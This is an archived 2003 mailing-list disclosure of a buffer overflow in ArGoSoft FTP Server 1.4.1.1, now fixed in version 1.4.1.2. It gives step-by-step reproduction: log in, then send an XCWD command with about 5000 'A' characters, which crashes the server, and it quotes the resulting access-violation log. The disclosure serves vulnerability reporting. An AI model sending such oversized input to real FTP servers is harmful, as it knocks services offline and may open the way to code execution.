Vulnerability Development mailing list archives
argosoft ftp server buffer overflow.
From: "Moran Zavdi" <moran () moozatech com>
Date: Thu, 25 Sep 2003 08:59:03 -0700
Hi, I've found that while using the command XCWD it is possible to overwrite the server memory and crash it. to overwrite the servers memory attacker have to do the following: verify the logging option is off (turned off by default). successfuly login to the ftp server. at this point if attacker will issue XCWD command with argument above 4096 chars overflow will occur. I tested it on Windows2000 and XP and they both crashed. I used putty to cause the overflow.. :) here is what I did. c:\> putty.exe localhost 21 220 ArGoSoft FTP Server for Windows NT/2000/XP, Version 1.4 (1.4.1.1) user ftp 502 Unknown command user ftp 331 User name OK, need password pass ftp 230 User ftp logged in successfully ** XCWD AAAAAAA....(5000 times) client closed connection. the logs look like this: 9/22/2003 1:38:07 PM - FTP Server started. Listening on port 21 9/22/2003 1:38:34 PM - Requested FTP connection from 127.0.0.1 ID=1 9/22/2003 1:38:49 PM - ( 1) 'Error: Access violation at address 00401F32 in module 'ftpsrvnt.exe'. Write of address 41414145 at this point the server will stop working and crash the program. ArgoSoft Has confirmed its a bug in while passing data using shared memory that allows attacker to bypass the internal buffer overflow check of the program. they Released a new version to fix this issue. version 1.4.1.2. it can be downloaded from: http://www.argosoft.com/applications/ftpserver/download.asp Regards, Moran Zavdi Moozatech IT Systems http://www.moozatech.com
Current thread:
- argosoft ftp server buffer overflow. Moran Zavdi (Sep 25)